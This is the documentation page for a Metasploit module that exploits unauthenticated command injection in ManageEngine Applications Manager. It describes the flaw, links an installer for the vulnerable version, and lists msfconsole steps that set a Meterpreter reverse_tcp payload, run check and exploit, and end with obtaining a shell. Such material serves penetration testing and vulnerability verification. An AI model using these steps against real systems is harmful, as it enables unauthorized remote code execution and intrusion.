Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/documentation/modules/exploit/windows/http/manageengine_appmanager_exec.md
Views: 11789
Vulnerable Application
This module exploits command injection vulnerability in the ManageEngine Applications Manager product. An unauthenticated user can execute a operating system command under the context of privileged user. Publicly accessible testCredential.do endpoint takes multiple user inputs and validates supplied credentials by accessing given system. This endpoint calls a several internal classes and then executes powershell script without validating user supplied parameter when the given system is OfficeSharePointServer.
Vulnerable Application Installation Steps
Go to following website and download Windows version of the product. It comes with built-in Java and Postgresql so you don't need to install anything else. http://archives.manageengine.com/applications_manager/13630/
Verification Steps
A successful check of the exploit will look like this:
Start
msfconsoleuse exploit/windows/http/manageengine_appmanager_execSet
RHOST <RHOST>Set
PAYLOAD windows/meterpreter/reverse_tcpSet
LHOST <LHOST>Run
checkVerify that you are seeing
The target is vulnerable.in console.Run
exploitVerify that you are seeing
Triggering the vulnerabilityin console.Verify that you are seeing
Sending stage to <TARGET>in console.Verify that you have your shell.